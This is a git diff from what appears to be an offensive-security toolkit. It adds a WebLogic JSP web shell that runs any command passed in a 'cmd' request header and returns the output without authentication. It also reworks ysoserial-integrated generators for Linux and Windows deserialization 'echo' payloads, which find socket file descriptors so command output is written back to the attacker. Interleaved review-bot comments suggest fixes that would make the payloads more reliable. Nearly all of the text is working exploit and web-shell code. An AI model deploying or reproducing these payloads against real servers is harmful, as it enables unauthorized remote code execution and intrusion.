+ }catch(Exception e){}
 }
- }
-
- //延迟2s
- Thread.sleep(2000);
-
- //第二次尝试
- for(int i = 0; i < 10000; i++){
- field.set(fileDescriptor, i);
-
- try{
- remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, fileDescriptor);
- if(remoteAddress.toString().startsWith("/127.0.0.1")) continue;
- list2.add(i);
- }catch(Exception e){
- //pass
- }
- }
-
- //取交集
- list1.retainAll(list2);
-
- for(Integer fdVal : list1){
- try{
- field.set(fileDescriptor, fdVal);
- Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
- String res = new java.util.Scanner(Runtime.getRuntime().exec("echo \"It works!!\"").getInputStream()).useDelimiter("\\A").next();
- String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + res.length() + "\n\n" + res + "\n";
- write.invoke(socketOutputStream, new Object[]{result.getBytes()});
- }catch (Exception e){
- //pass
+ for(int i = list.size() - 1; i >= 0; i--){
+ try{
+ field.set((Object)fileDescriptor, list.get(i));
+ Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});
+ String[] cmd = new String[]{"cmd","/C", "whoami"};
+ String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next().trim();
+ String result = "HTTP/1.1 200 OK\nConnection: close\nContent-Length: " + (res.length()) + "\n\n" + res + "\n\n";
+ write.invoke(socketOutputStream, new Object[]{result.getBytes()});
+ break;
+ }catch (Exception e){
+ //pass
+ }
 }
 }
 %>
\ No newline at end of file
diff --git a/weblogic/README.md b/weblogic/README.md
index d562358..a2f1097 100644
--- a/weblogic/README.md
+++ b/weblogic/README.md
@@ -1,4 +1,4 @@
-# Weblogic 反序列化回显
+# Weblogic 回显
 ## 说明
 代码直接搬运了 ```lufei``` 师傅的代码
diff --git a/weblogic/code/WeblogicEcho.jsp b/weblogic/code/WeblogicEcho.jsp
new file mode 100644
index 0000000..aaf3d18
--- /dev/null
+++ b/weblogic/code/WeblogicEcho.jsp
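Review bot: The new descriptor-scan loop ends in a bare `}catch(Exception e){}` with no comment, while the second loop in the same hunk keeps the `//pass` marker the rest of the file uses; an empty catch with nothing inside reads as an oversight rather than a deliberate skip. Bringing the two in line, `}catch(Exception e){ //pass }` or `catch (Exception ignored)`, makes the intent consistent without changing behaviour. The comments that explained the old two-pass design (`//第一次尝试`, `//延迟2s`, `//取交集`) were removed along with the code, and the single-pass replacement is left uncommented; a one-line header comment stating what the loop over `50000` descriptors is collecting would restore that readability.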
@@ -0,0 +1,29 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ weblogic.work.WorkAdapter adapter = ((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork();
+ if(adapter.getClass().getName().endsWith("ServletRequestImpl")){
+ String cmd = (String) adapter.getClass().getMethod("getHeader", String.class).invoke(adapter, "cmd");
+
+ if(cmd != null && !cmd.isEmpty()){
+ String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) adapter.getClass().getMethod("getResponse").invoke(adapter);
+ res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+ res.getServletOutputStream().flush();
+ res.getWriter().write("");
+ }
+ }else{
+ java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
+ field.setAccessible(true);
+ Object obj = field.get(adapter);
+ obj = obj.getClass().getMethod("getServletRequest").invoke(obj);
+ String cmd = (String) obj.getClass().getMethod("getHeader", String.class).invoke(obj, "cmd");
+
+ if(cmd != null && !cmd.isEmpty()){
+ String result = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
+ weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) obj.getClass().getMethod("getResponse").invoke(obj);
+ res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
+ res.getServletOutputStream().flush();
+ res.getWriter().write("");
+ }
+ }
+%>
diff --git a/weblogic/code/weblogic-10.0.3.jsp b/weblogic/code/weblogic-10.0.3-deprecated.jsp
similarity index 100%
rename from weblogic/code/weblogic-10.0.3.jsp
rename to weblogic/code/weblogic-10.0.3-deprecated.jsp
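Review bot: `new java.util.Scanner(...).useDelimiter("\\A").next()` on both `String result =` lines throws `NoSuchElementException` when the command writes nothing to stdout, and stderr is never read, so a failing command surfaces as a server error instead of its error text; split it into `Process p = Runtime.getRuntime().exec(cmd);`, `java.util.Scanner s = new java.util.Scanner(p.getInputStream()).useDelimiter("\\A");`, `String result = s.hasNext() ? s.next() : "";` and consider a `ProcessBuilder` with `redirectErrorStream(true)` so stderr is echoed as well. The `Process` is never waited for or destroyed, so every request leaves its stdout/stderr pipes open until the object is collected. The `cmd` header is executed with no shared secret or any other check, so the page is unauthenticated RCE for anyone who can reach it — if it is ever placed on a target during an engagement it should be gated on a second secret header and removed afterwards. `res.getWriter().write("")` after `getServletOutputStream()` looks intended to commit the response; the Servlet spec makes that combination an `IllegalStateException`, so it presumably relies on WebLogic-specific behaviour and deserves a comment saying so. The two branches duplicate the exec-and-echo body and could share one helper.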
diff --git a/weblogic/code/weblogic-12.1.3.jsp b/weblogic/code/weblogic-12.1.3-deprecated.jsp similarity index 100% rename from weblogic/code/weblogic-12.1.3.jsp rename to weblogic/code/weblogic-12.1.3-deprecated.jsp diff --git "a/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" "b/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" index 0717e08..a5e2269 100644 --- "a/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" +++ "b/\351\233\206\346\210\220\345\210\260ysoserial/DirectiveProcessor.java" @@ -7,7 +7,7 @@ public class DirectiveProcessor{ public static void main(String[] args) throws IOException { - System.out.println(process("directive:AutoFindRequestEcho")); + System.out.println(process("directive:WindowsEcho:whoami")); } public static String process(String command){ 
@@ -75,50 +75,61 @@ public static String linuxEcho(String command){ String cmd = command.split(":", 3)[2]; cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); - String code = "String command = \"ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\\\"[\\\"}''{print $2}'|sed 's/.$//'\";\n" + - " String[] cmd = new String[]{\"/bin/sh\", \"-c\", command };\n" + - " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + - " java.util.List res1 = new java.util.ArrayList();\n" + - " String line = \"\";\n" + - " while ((line = br.readLine()) != null){\n" + - " res1.add(line);\n" + - " }\n" + - " br.close();\n" + + String code = " if(java.io.File.separator.equals(\"/\")){\n" + + " String command = \"ls -al /proc/$PPID/fd|grep socket:|awk 'BEGIN{FS=\\\"[\\\"}''{print $2}'|sed 's/.$//'\";\n" + + " String[] cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" + + " java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + + " java.util.List res1 = new java.util.ArrayList();\n" + + " String line = \"\";\n" + + " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" + + " res1.add(line);\n" + + " }\n" + + " br.close();\n" + "\n" + - " Thread.sleep((long)2000);\n" + + " try {\n" + + " Thread.sleep((long)2000);\n" + + " } catch (InterruptedException e) {\n" + + " //pass\n" + + " }\n" + "\n" + - " command = \"ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'\";\n" + - " cmd = new String[]{\"/bin/sh\", \"-c\", command };\n" + - " br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + - " java.util.List res2 = new java.util.ArrayList();\n" + - " while ((line = br.readLine()) != null){\n" + - " res2.add(line);\n" + - " }\n" + - " br.close();\n" + - "\n" + - " int index = 0;\n" + - " int max = 0;\n" + - " for(int i = 0; i < 
res1.size(); i++){\n" + - " for(int j = 0; j < res2.size(); j++){\n" + - " if(((String)res2.get(j)).contains((String)res1.get(i))){\n" + - " String socketNo = ((String)res2.get(j)).split(\"\\\\s+\")[1].substring(8);\n" + + " command = \"ls -al /proc/$PPID/fd|grep socket:|awk '{print $9, $11}'\";\n" + + " cmd = new String[]{\"/bin/sh\", \"-c\", command};\n" + + " br = new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec(cmd).getInputStream()));\n" + + " java.util.List res2 = new java.util.ArrayList();\n" + + " while ((line = br.readLine()) != null && !line.trim().isEmpty()){\n" + + " res2.add(line);\n" + + " }\n" + + " br.close();\n" + + "\n" + + " int index = 0;\n" + + " int max = 0;\n" + + " for(int i = 0; i < res2.size(); i++){\n" + + " try{\n" + + " String socketNo = ((String)res2.get(i)).split(\"\\\\s+\")[1].substring(8);\n" + " socketNo = socketNo.substring(0, socketNo.length() - 1);\n" + - " if(Integer.parseInt(socketNo) > max) {\n" + - " max = Integer.parseInt(socketNo);\n" + - " index = j;\n" + + " for(int j = 0; j < res1.size(); j++){\n" + + " if(!socketNo.equals(res1.get(j))) continue;\n" + + "\n" + + " if(Integer.parseInt(socketNo) > max) {\n" + + " max = Integer.parseInt(socketNo);\n" + + " index = j;\n" + + " }\n" + + " break;\n" + " }\n" + + " }catch(Exception e){\n" + + " //pass\n" + " }\n" + " }\n" + - " }\n" + "\n" + - " int fd = Integer.parseInt(((String)res2.get(index)).split(\"\\\\s\")[0]);\n" + - " java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});\n" + - " c.setAccessible(true);\n" + - " cmd = new String[]{\"/bin/sh\", \"-c\", \"" + cmd + "\" };\n" + - " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + - " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + - " java.io.FileOutputStream os = new 
java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));\n" + - " os.write(result.getBytes());"; + " int fd = Integer.parseInt(((String)res2.get(index)).split(\"\\\\s\")[0]);\n" + + " java.lang.reflect.Constructor c= java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});\n" + + " c.setAccessible(true);\n" + + " cmd = new String[]{\"/bin/sh\", \"-c\", \"" + cmd + "\"};\n" + + " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next();\n" + + " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + + " java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));\n" + + " os.write(result.getBytes());\n" + + " }"; return code; } 
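Review bot: The generated loop stores `index = j`, the position in `res1`, but the fd is then read with `res2.get(index)`; after the loops were swapped (`i` over `res2`, `j` over `res1`) the chosen line is only correct when both listings happen to be in the same order, and a socket that appeared or vanished during the 2 s sleep shifts the indices so the response is written to the wrong fd. It should be `index = i;`. The generated `Content-Length` uses `res.length()` (characters) while `os.write(result.getBytes())` emits platform-encoded bytes, so non-ASCII command output gets a truncated body; derive the length from the byte array instead. The `cmd` text is only backslash- and quote-escaped before being spliced into a Java string literal, so a command containing a newline breaks the emitted source. linuxEcho's signature is outside the hunk.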
@@ -389,56 +400,52 @@ public static String windowsEcho(String command){ String cmd = command.split(":", 3)[2]; cmd = cmd.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\""); - String code = " java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField(\"fd\");\n" + - " field.setAccessible(true);\n" + + String code = " if(java.io.File.separator.equals(\"\\\\\")){\n" + + " java.lang.reflect.Field field = java.io.FileDescriptor.class.getDeclaredField(\"fd\");\n" + + " field.setAccessible(true);\n" + "\n" + - " Class clazz1 = Class.forName(\"sun.nio.ch.Net\");\n" + - " java.lang.reflect.Method method1 = clazz1.getDeclaredMethod(\"remoteAddress\",new Class[]{java.io.FileDescriptor.class});\n" + - " method1.setAccessible(true);\n" + + " Class clazz1 = Class.forName(\"sun.nio.ch.Net\");\n" + + " java.lang.reflect.Method method1 = clazz1.getDeclaredMethod(\"remoteAddress\",new Class[]{java.io.FileDescriptor.class});\n" + + " method1.setAccessible(true);\n" + "\n" + - " Class clazz2 = Class.forName(\"java.net.SocketOutputStream\", false, null);\n" + - " java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];\n" + - " constructor2.setAccessible(true);\n" + + " Class clazz2 = Class.forName(\"java.net.SocketOutputStream\", false, null);\n" + + " java.lang.reflect.Constructor constructor2 = clazz2.getDeclaredConstructors()[0];\n" + + " constructor2.setAccessible(true);\n" + "\n" + - " Class clazz3 = Class.forName(\"java.net.PlainSocketImpl\");\n" + - " java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});\n" + - " constructor3.setAccessible(true);\n" + + " Class clazz3 = Class.forName(\"java.net.PlainSocketImpl\");\n" + + " java.lang.reflect.Constructor constructor3 = clazz3.getDeclaredConstructor(new Class[]{java.io.FileDescriptor.class});\n" + + " constructor3.setAccessible(true);\n" + "\n" + - " java.lang.reflect.Method write = 
clazz2.getDeclaredMethod(\"write\",new Class[]{byte[].class});\n" + - " write.setAccessible(true);\n" + + " java.lang.reflect.Method write = clazz2.getDeclaredMethod(\"write\",new Class[]{byte[].class});\n" + + " write.setAccessible(true);\n" + "\n" + - " java.net.InetSocketAddress remoteAddress = null;\n" + - " java.util.List list1 = new java.util.ArrayList();\n" + - " java.util.List list2 = new java.util.ArrayList();\n" + - " java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();\n" + - " for(int i = 0; i < 10000; i++){\n" + - " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" + - " try{\n" + - " remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" + - " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" + - " list1.add(new Integer(i));\n" + - " }catch(Exception e){}\n" + - " }\n" + + " java.net.InetSocketAddress remoteAddress = null;\n" + + " java.util.List list = new java.util.ArrayList();\n" + + " java.io.FileDescriptor fileDescriptor = new java.io.FileDescriptor();\n" + + " for(int i = 0; i < 50000; i++){\n" + + " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" + + " try{\n" + + " remoteAddress= (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" + + " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" + + " if(remoteAddress.toString().startsWith(\"/0:0:0:0:0:0:0:1\")) continue;\n" + + " list.add(new Integer(i));\n" + "\n" + - " Thread.sleep((long)2000);\n" + - " for(int i = 0; i < 10000; i++){\n" + - " field.set((Object)fileDescriptor, (Object)(new Integer(i)));\n" + - " try{\n" + - " remoteAddress = (java.net.InetSocketAddress) method1.invoke(null, new Object[]{fileDescriptor});\n" + - " if(remoteAddress.toString().startsWith(\"/127.0.0.1\")) continue;\n" + - " list2.add(new Integer(i));\n" + - " }catch(Exception e){}\n" + - " }\n" + + " }catch(Exception e){}\n" + + " }\n" + "\n" + - " 
list1.retainAll(list2);\n" + - " for(int i = 0; i < list1.size(); i++){\n" + - " try{\n" + - " field.set((Object)fileDescriptor, list1.get(i));\n" + - " Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});\n" + - " String res = new java.util.Scanner(Runtime.getRuntime().exec(\"" + cmd + "\").getInputStream()).useDelimiter(\"\\\\A\").next();\n" + - " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + res.length() + \"\\n\\n\" + res + \"\\n\";\n" + - " write.invoke(socketOutputStream, new Object[]{result.getBytes()});\n" + - " }catch (Exception e){}\n" + + " for(int i = list.size() - 1; i >= 0; i--){\n" + + " try{\n" + + " field.set((Object)fileDescriptor, list.get(i));\n" + + " Object socketOutputStream = constructor2.newInstance(new Object[]{constructor3.newInstance(new Object[]{fileDescriptor})});\n" + + " String[] cmd = new String[]{\"cmd\",\"/C\", \"" + cmd + "\"};\n" + + " String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter(\"\\\\A\").next().trim();\n" + + " String result = \"HTTP/1.1 200 OK\\nConnection: close\\nContent-Length: \" + (res.length()) + \"\\n\\n\" + res + \"\\n\\n\";\n" + + " write.invoke(socketOutputStream, new Object[]{result.getBytes()});\n" + + " break;\n" + + " }catch (Exception e){\n" + + " //pass\n" + + " }\n" + + " }\n" + " }"; return code; }
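Review bot: The new loop writes the response to the highest-numbered non-loopback socket fd that accepts a write and then `break`s, so the command output goes to whichever remote connection owns that fd; with the second scan and `retainAll` intersection removed, nothing visible here ties that fd to the request that carried the command, and on a server with other clients connected the output could land in someone else's connection. Consider keeping the second scan, or verifying the candidate's remote address against the current request before writing, and adding a comment stating the assumption that the newest fd is the caller. `Content-Length` is computed from `res.length()` (characters) while `result.getBytes()` is platform-encoded — `cmd /C` output on a non-English Windows is not ASCII — so the declared length is too short; use the byte length, and note that the trailing `"\n\n"` is outside the declared length anyway. The reflective access to `sun.nio.ch.Net` and `java.net.PlainSocketImpl` is denied by default from JDK 16 and `PlainSocketImpl` was removed in later JDKs, so this path is older-JDK-only and the generated code should say so. windowsEcho's signature is outside the hunk.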